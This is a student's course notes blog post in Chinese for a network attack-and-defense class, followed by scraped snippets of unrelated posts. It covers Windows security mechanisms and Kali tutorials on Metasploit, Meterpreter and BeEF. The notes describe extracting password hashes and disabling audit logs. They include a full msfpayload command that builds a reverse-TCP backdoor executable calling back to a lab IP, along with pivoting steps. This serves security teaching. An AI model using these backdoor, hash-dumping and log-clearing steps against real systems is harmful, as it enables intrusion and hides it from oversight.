2017-2018-2 20179226 《网络攻防》第7周作业

课程学习

1.windows操作系统内核实现的核心机制有:

1)Windows进程和线程管理机制

2)Windows内存管理机制

3)Windows文件管理机制(NTFS)

4)Windows注册表管理机制(注册表中的系统自启动挂接点上注册的应用软件可以随系统引导而自动运行,因此也是很多恶意代码及流氓软件普遍的攻击目标)

5)Windows的网络机制(从OSI网络参考模型的物理层到应用层,各层上对应的Windows网络组件模块)

2.Windows授权与访问控制机制

Windows的授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。 在Windows服务器操作系统中,用户可以执行内建的whoami命令来查看当前用户的访问令牌信息。 Windows对于系统中所有需保护的资源都抽象成对象,具体类型包括文件、目录、注册表键值、内核对象、同步对象、私有对象、管道、内存、通信接口等,而对每个对象会关联一个SD安全描述符. 对象安全描述符由如下主要属性组成:Owner SID、Group SID、DACL自主访问控制列表、SACL系统审计访问控制列表。

3.Windows 远程安全攻防技术

Windows远程攻防技术可以分为以下几大类:远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户。 Windows系统上的安全漏洞生命周期:漏洞发现与披露、渗透测试与利用攻击、漏洞修补等。

4.Windows的其他安全机制

身份认证、授权与访问控制以及安全审计是三个基本安全功能。 保护Windows系统安全稳定运行最为关键的三项安全措施——防火墙、补丁自动更新以及病毒防护。 除安全中心之外,Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等

5.Windows系统口令字密文提取技术

在本地获取口令字密文的主要包括如下三种途径:

1)从另一种操作系统启动后拷贝文件系统中的口令密文文件

2)利用硬盘修复工具包中的rdisk工具,执行rdisk/s-命令创建SAM备份文件副本

3)使用pwdumpX系列工具直接从SAM文件或活动目录中提取口令字密文

6.Windows消踪灭迹

1)关闭审计功能(Windows Resource Kit工具包里的auditpol程序可以让他们轻易地关闭审计功能)

2)清理事件日志(使用Event Viewer事件查看器来打开、读取和清除这台主机上的事件日志)

视频学习

一、KaliSecurity 漏洞利用之检索与利用

searchsploit

searchsploit可以借助关键词搜索漏洞信息以及漏洞对应的exp,命令searchsploit wordpress列出了漏洞和文件地址。

查看列出的文件,例:

二、KaliSecurity 漏洞利用之Metasploit基础

Metasploit在渗透测试中经常被用到。这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。

1.启动服务

在Kali中使用metasploit,需要先启动Postgre SQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。

service postgresql start
service metasploit start

如果 不想每次开机都手动启动服务,可以配置随系统启动 update-rc.d postgresql enable update-rc.d metasploit enable

2.路径介绍

Kali中msf的路径为/usr/share/metasploit-framework

Auxiliary:辅助模块 encoders:供msfencode编码工具使用,具体可以使用msfencode -l。

exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_metapi,它就在这个目录。

payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码,比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump、arp_scanner就在这里。

3.基本命令

msfpayload:用来生成payload或者shellcode。

搜索的时候可以用msfpayload -l | grep "windows"这样的命令查询。

-o 选项可以列出payload所需的参数

msfencode:msf中的编码器,早期为了编码绕过AV,现在常用msfpayload与它编码避免exploit的坏字符串。

1)输入msfconsole,打开msf:

2)发现漏洞,使用命令nmap -sV 192.168.1.124

3)使用set设置参数:

三、KaliSecurity 漏洞利用之Meterpreter介绍

Meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpreter shell链接。

Meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。其有很多有用的功能,如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清楚应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

常用的命令:

background:将当前会话放置后台

load/use:加载模块

Interact:切换进一个信道

migrate:迁移进程

run:执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有autoroute,hashdump,arp_scanner,multi_inject等

Resource:执行一个已有的rc脚本常用的Meterpreter类型为:payload/windows/meterpreter/reverse_tcp

针对windows操作系统,反向连接shell,使用起来比较稳定。

生成Meterpreter后门;打开MSF,开启监听(选择exploit/multi/handler);在目标机器上执行door.exe;

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.113 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* 查看自己的IP地址为192.168.8.113,LHOST、LPORT为reverse_tcp的参数,可以在msf里查看到(记得把服务启动)*/

四、KaliSecurity 漏洞利用之Metasploit后渗透测试

在跳板获取一定权限后需要积极地向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的Meterpreter后门,可以使系列的操作更容易。

1.查看当前网卡、网段信息(使用ifconfig)。可查看到三个网卡,一个是本地网卡,另一个是我们能访问的网卡,还有一个网卡具有内网IP(访问不到,可以ping以下试试)。

2.添加路由表run autoroute -s 10.0.0.1可以使用msf中的模块跨网段攻击或扫描。可通过脚本autoroute快速添加。

3.开socket代理,通过使用auxiliary/server/socks4a模块,创建一个socks代理,可以为浏览器,sqlmap,nmap使用。通过代理即可访问内网计算机。

4.通过background和session -i可以自由切换进入session。

5.输入run可以看到在meterpreter上可以做的很多命令。

6.通过run post/可以看到后渗透测试模块

7.获取内网信息run arp_scanner -r 10.0.0.1/24

8.也可以上传文件,做端口转发后进行后续测试,例如upload lcx.exe c:\\传送文件到c盘根目录。

五、KaliSecurity 漏洞利用之BeEF

1.输入命令beef-xss启动BeeF

2.使用默认用户名beef与默认密码beef登录

3.HOOK持续的时间为关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令,在Commands模块,我们可以完成很多任务:

其中,4种颜色分别表示:

绿色:该攻击模块可用,且隐蔽性强

灰色:该攻击模块可用,但隐蔽性差

橙色:该用户模块是否可用还有待验证

红色:该攻击模块不可用

4.例如,选取MISC下的Raw JavaScript模块作为测试用例,右端表格有该模块的详细说明,以及一些可用的参数等。输入JavaScript code,点击Excute进行攻击。

5.Proxy功能(代理功能)

选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。

6.BeFF默认是不加载Metasploit的,如果要使用Metasploit丰富的攻击模块,需要做些配置。

修改/usr/share/beef-xss/config.yaml中的metasploit 一行为true

保证此处IP等信息设置正确(不适用127.0.0.1,需使用本机IP),并修改Custom路径,配置好后,打开msfconsole,运行命令load msgrpc ServerHost=192.168.1.124 Pass=abc123

原文地址:https://www.cnblogs.com/9226ryf/p/8856267.html

时间: 2024-10-07 08:25:07

2017-2018-2 20179226 《网络攻防》第7周作业的相关文章

《网络攻防第八周作业》

网络攻防环境的搭建与测试 环境包括Windows靶机.Linux靶机.Windows攻击机.Linux攻击机下图为四台机器的IP地址截图下图为测试靶机与攻击机之间的连通性测试: kali视频学习: 第31节 kali漏洞利用之SET Social Engineering Toolkit(SET)是一个开源.Python驱动的社会工程学渗透测试工具,提供了非常丰富的攻击向量库.是开源的社会工程学利用套件,通常结合metasploit来使用.1.命令行输入setoolkit打开SET套件 2.如上图

2017-2018-2 20179302《网络攻防》第九周作业

教材学习总结 本周主要学习了<网络攻防---技术与实践>第9.10章的内容,主要学习了 恶意代码攻防 与软件安全攻防 恶意代码安全攻防 1.基础知识 恶意代码是指使计算机按照攻击者的意图执行以达到恶意目标的指令集.类型包括:计算机病毒.蠕虫.恶意移动代码.后门.特洛伊木马.僵尸程序.内核套件.融合型恶意代码. 计算机病毒的基本特性:感染性.潜伏性.可触发性.破坏性.衍生性 僵尸网络命令与控制机制包括: (1)基于IRC协议的命令与控制机制 (2)基于HTTP协议的命令与控制机制 (3)基于P2

网络攻防第五周作业

1.Web应用程序安全攻防 Web应用体系结构包括浏览器.web服务器.web应用程序数据库.传输协议. Web应用安全威胁和攻击类型:针对浏览器和终端用户的Web浏览安全威胁:系统层安全威胁:Web服务器软件安全威胁:Web应用程序安全威胁:Web数据安全威胁. Web应用安全攻防技术概述 Web应用的信息收集,针对Web应用程序的探测和漏洞发现的技术方法:手工审查Web应用程序结构与源代码.自动下载与镜像Web站点页面.使用Google Hacking技术审查与探测Web应用程序.Web应用

网络攻防第七周作业

教材第七章总结 01 知识要点总结 windows系统的基本架构 1.windows系统的发展与现状 2.windows系统的基本结构 windows系统的安全体系结构与机制 1.windows系统的安全体系结构概述 2.windows认证机制 3.windows系统访问与授权机制 4.windows系统安全审计机制 5.windows系统的其他安全机制 windows系统安全攻防技术 1.windows系统的安全漏洞 2.windows远程口令猜解 3.windows服务远程 4.手动实践:M

《网络攻防》第九周作业

kali视频学习 第36节 压力测试工具1.VoIP压力测试工具web压力测试:2.thc-ssl-dos的验证.3.dhcpig 尝试耗尽所有IP地址4.ipv6工具包5.inundator IDS/IPS/WAF压力测试工具耗尽对方说的日志资源.6.macof可做泛红攻击8.t50压力测试9.无线压力测试mdk3和reaver 第37节 数字取证工具 数字取证技术是将计算机调查和分析技术应用于对潜在的.有法律效力的电子证据的确定与获取,同样他们都是针对黑客和入侵目的的.目的都是保证网络的安全

2017-2018-2 20179209《网络攻防》第一周作业

你对师生关系的理解,希望是哪种关系? 处于研究生的我们,自学体系应该相比本科生更加完备.如果到现在获取知识的方式仍是以老师讲为主渠道,那基本上就已经废了.那么老师在我们自学过程中应该扮演什么角色?--引导者.督促者.人都是有惰性的,学习过程中难免会松懈,如果要不断上进,那就需要这么一位"铁面无私"的监督者:尽管我们要以自学为主,但就像自己走完一段陌生的路一样,需要有人导引方向.这是我对这一阶段师生关系的理解,也希望它能出现在我和我的老师之间. 如何提问? 正如老师所说,我们现在遇到的所

2017-2018-2 20179305《网络攻防》第一周作业

Q1:你对师生关系的理解,希望是哪种关系? 在我看来,师生关系是一种互相促进,良心发展的关系.师生在互动中所得到的不仅仅是知识的交融,更是心灵的碰撞.学生在获得知识的同时,更多的是收获到了学习的方法以及学习的积极性,与此同时,学生的主动性使得课堂氛围更加活跃,学习氛围更加融洽. Q2:如何提问? 1.找到自己的问题所在,尝试用所学知识或者书本网络资源解决问题. 2.若找不到问题的解决方法,则选择合适的提问方式,向老师提问大致的解决方向,而不是单纯的询问问题答案. 3.在获得解决方法之后,尝试与自

2017-2018-2 20179219《网络攻防》第一周作业

Q:你对师生关系的理解,希望是哪种关系? A: 我认为老师(仅仅是名义上的老师除外)分两种,一种是学术型老师,这种老师更为注重教授学生学业.另一种是导向型老师,这种老师也许不会着重学生的学术造诣,但会均衡学生的学术和品格的培养.客观的讲两种导师各有特点,不分高下. 我以前看过浙江大学教授郑强的讲座视频,有一句话记了很多年--"老师不要糊里糊涂的教,学生也不要糊里糊涂的学". 我认同teacher lou对于师生关系的描述,老师愿意教愿意学的学生(有点绕). Q:如何提问? A:没有自己

解题报告——-2018级2016第二学期第三周作业

解题报告——2018级2016第二学期第三周作业 A:[NOIP2002P]过河卒 题目: 描述 如图,A 点有一个过河卒,需要走到目标 B   点.卒行走规则:可以向下.或者向右.同时在棋盘上的任一点有一个对方的马(如上图的C点),该马所在的点和所有跳跃一步可达的点称为对方马的控制点.例 如上图 C  点上的马可以控制 9 个点(图中的P1,P2 … P8 和 C).卒不能通过对方马的控制点. 棋盘用坐标表示,A 点(0,0).B 点(n,m)(n,m 为不超过 20  的整数,并由键盘输入)

解题报告——2018级2016第二学期第五周作业排座椅

解题报告--2018级2016第二学期第五周作业 F:排座椅 描述 上课的时候总会有一些同学和前后左右的人交头接耳,这是令小学班主任十分头疼的一件事情.不过,班主任小雪发现了一些有趣的现象,当同学们的座次确定下来 之后,只有有限的D对同学上课时会交头接耳.同学们在教室中坐成了M行N列,坐在第i行第j列的同学的位置是(i,j),为了方便同学们进出,在教室中设 置了K条横向的通道,L条纵向的通道.于是,聪明的小雪想到了一个办法,或许可以减少上课时学生交头接耳的问题:她打算重新摆放桌椅,改变同学们桌椅